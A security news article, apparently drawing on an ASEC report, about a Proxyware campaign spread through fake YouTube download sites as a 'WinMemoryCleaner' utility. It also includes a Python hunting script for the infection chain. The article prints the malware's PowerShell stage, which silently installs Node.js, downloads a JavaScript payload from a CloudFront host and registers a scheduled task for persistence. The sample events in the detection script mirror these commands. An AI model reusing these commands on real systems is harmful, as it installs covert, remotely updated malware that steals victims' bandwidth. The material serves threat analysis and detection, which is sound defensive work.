Proxyware Malware Mimics YouTube Video Download Site to Deliver Malicious JavaScript


Cybersecurity researchers have observed a surge in deceptive sites masquerading as YouTube video download services to deliver Proxyware malware in recent weeks.

Victims seeking to grab videos in MP4 format are redirected through ad pages that sporadically present a download link for a seemingly legitimate utility called “WinMemoryCleaner.”

Behind this innocuous facade, however, lies a multi-stage installer that ultimately deploys Proxyware and covertly enslaves the system’s network bandwidth.


The initial download executable, Setup.exe, unpacks WinMemoryCleaner.exe into the Program Files directory before triggering an update script via WinMemoryCleanerUpdate.bat.

Once executed, WinMemoryCleaner.exe performs environment checks to evade virtual machines or sandbox analysis, then invokes a PowerShell payload that installs Node.js and fetches a malicious JavaScript component from a remote server.

Attack Flow (Source – ASEC)

ASEC analysts identified this technique as a refined evolution of previous Proxyware campaigns, noting the attacker’s reliance on GitHub for hosting intermediary tools.

Subsequent stages involve the registration of two scheduled tasks—“Schedule Update” and “WindowsDeviceUpdates”—that ensure the JavaScript runs periodically under Node.js.

This script communicates basic system information to a command-and-control server and awaits directives, which can include fetching additional scripts or initiating the final Proxyware installation.

Information Sent to C&C Server (Source – ASEC)

ASEC researchers noted that the actor has pivoted from distributing only DigitalPulse and HoneyGain Proxyware to integrating Infatica’s agent, enhancing bandwidth theft capabilities.

The impact of this campaign is twofold: affected systems experience degraded network performance, and the attacker monetizes the stolen bandwidth through affiliate programs.

YouTube Downloader Page and Malware Download Link (Source – ASEC)

Proxyware programs typically share a machine's idle network throughput and promise remuneration to the user who installs them; compromised victims, however, unwittingly supply bandwidth without any compensation.

In regions with high adoption of streaming services, such as South Korea, the campaign’s reach has grown significantly, prompting warnings from major AV vendors.

Infection Mechanism

A deeper examination of the infection mechanism reveals the pivotal role of the PowerShell script delivered by WinMemoryCleaner.exe.

The script begins with a silent installation of Node.js:

# Download the Node.js MSI into %TEMP% and install it with no UI (/qn)
Invoke-WebRequest -Uri "https://nodejs.org/dist/v14.17.0/node-v14.17.0-x64.msi" -OutFile "$env:TEMP\node.msi"
Start-Process msiexec.exe -ArgumentList '/i', "$env:TEMP\node.msi", '/qn' -Wait

Once Node.js is in place, the script downloads pas.js from a CloudFront URL, saves it as p.js next to the fake utility, and registers a scheduled task that runs it:

# Fetch the JavaScript stage into the fake utility's directory under Program Files
$jsUrl = "https://d14vmbql41e8a5.cloudfront.net/pas.js"
$jsPath = "$env:ProgramFiles\WinMemoryCleaner\p.js"
Invoke-WebRequest -Uri $jsUrl -OutFile $jsPath
# Persistence: run the script under node every 30 minutes. The path contains a space,
# so it is quoted inside the /TR action (Windows PowerShell 5.1 quoting shown)
schtasks /Create /F /SC MINUTE /MO 30 /TN "Schedule Update" /TR "node \`"$jsPath\`""

Because the scheduled tasks relaunch the JavaScript component under Node.js every 30 minutes, the operator can push updated scripts and the final Proxyware payload at will, and killing the running node.exe process is not enough: eradication requires removing the tasks, the dropped script and the Node.js runtime the installer added.
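The chain described in this section leaves four distinct process-creation events that a SOC can hunt for. The following is an added example written for this page, not code from the article or from the ASEC report: it expresses those four stages as checks over Sysmon-style process-creation events (image, parent image, command line). The event layout, the sample command lines (including the benign controls), the stage names and the severity labels are all constructed assumptions; only the two task names and the WinMemoryCleaner/p.js paths come from the article.

```python
"""Hunting rules for the WinMemoryCleaner -> Node.js -> scheduled-task chain.

Added example: the four stages the article describes (fake utility spawns
PowerShell, quiet Node.js MSI install from TEMP, schtasks persistence that
runs node on a .js file, node.exe executing a script from Program Files)
expressed as checks over process-creation events. The event layout and
every sample command line below are constructed for this example.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str         # full path of the created process
    parent_image: str  # full path of its parent
    cmdline: str       # command line as logged


@dataclass
class Finding:
    stage: str
    severity: str
    detail: str


# Task names reported for this campaign (from the article text).
KNOWN_TASK_NAMES = {"schedule update", "windowsdeviceupdates"}

_TASK_NAME = re.compile(r'/tn\s+(?:"([^"]+)"|(\S+))', re.I)
_JS_ARG = re.compile(r'"([^"]+\.js)"|(\S+\.js)\b', re.I)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _task_name(cmdline: str):
    m = _TASK_NAME.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def _js_args(cmdline: str) -> list:
    # Every argument that names a .js file, quoted or not.
    return [a or b for a, b in _JS_ARG.findall(cmdline)]


def check_event(ev: ProcEvent) -> list:
    img, parent = _basename(ev.image), _basename(ev.parent_image)
    cl = ev.cmdline.lower()
    out = []

    # Stage 1: the fake utility launches a shell (WinMemoryCleaner.exe -> PowerShell).
    if parent == "winmemorycleaner.exe" and img in ("powershell.exe", "pwsh.exe", "cmd.exe"):
        out.append(Finding("loader", "high", f"{parent} spawned {img}"))

    # Stage 2: quiet msiexec install of a Node.js MSI staged in a temp directory.
    if (img == "msiexec.exe" and "/i" in cl and "node" in cl and ".msi" in cl
            and ("/qn" in cl or "/quiet" in cl) and "\\temp\\" in cl):
        out.append(Finding("nodejs_install", "medium",
                           "quiet msiexec install of a Node.js MSI from a temp directory"))

    # Stage 3: scheduled task whose action runs node on a .js file.
    if img == "schtasks.exe" and "/create" in cl and "/tr" in cl:
        action = cl.split("/tr", 1)[1]
        if re.search(r"\bnode(\.exe)?\b", action) and ".js" in action:
            name = _task_name(ev.cmdline)
            sev = "high" if name and name.lower() in KNOWN_TASK_NAMES else "medium"
            out.append(Finding("persistence", sev, f"task {name!r} runs node on a .js file"))

    # Stage 4: node.exe executing a script that lives under Program Files. A developer's
    # node.exe also sits there, so the script argument is inspected, not the image path.
    if img == "node.exe" and any("\\program files\\" in js for js in _js_args(cl)):
        out.append(Finding("execution", "medium", "node.exe running a script under Program Files"))
    return out


def hunt(events) -> list:
    findings = []
    for ev in events:
        findings.extend(check_event(ev))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed: the first four mirror the chain, the rest are benign controls
    ProcEvent(PS, r"C:\Program Files\WinMemoryCleaner\WinMemoryCleaner.exe",
              "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe", PS,
              r"msiexec.exe /i C:\Users\victim\AppData\Local\Temp\node.msi /qn"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe", PS,
              r'schtasks /Create /F /SC MINUTE /MO 30 /TN "Schedule Update" '
              r'/TR "node \"C:\Program Files\WinMemoryCleaner\p.js\""'),
    ProcEvent(r"C:\Program Files\nodejs\node.exe", r"C:\Windows\System32\svchost.exe",
              r'node "C:\Program Files\WinMemoryCleaner\p.js"'),
    ProcEvent(r"C:\Program Files\nodejs\node.exe", r"C:\Windows\System32\cmd.exe",
              r'"C:\Program Files\nodejs\node.exe" C:\Users\dev\app\index.js'),
    ProcEvent(r"C:\Windows\System32\msiexec.exe", r"C:\Windows\explorer.exe",
              r"msiexec.exe /i C:\Users\dev\Downloads\tool.msi"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\cmd.exe",
              r'schtasks /Create /SC DAILY /TN "Backup" /TR "C:\Tools\backup.bat"'),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.stage}: {f.detail}")
```

Run on the constructed sample, the first four events each produce one finding and the three benign controls produce none; the persistence finding is rated high only because the task name matches one the article reports, so a renamed task still surfaces at medium. The stage-4 rule deliberately keys on where the script lives rather than on node.exe itself, since Node.js under Program Files is normal on developer machines.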


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.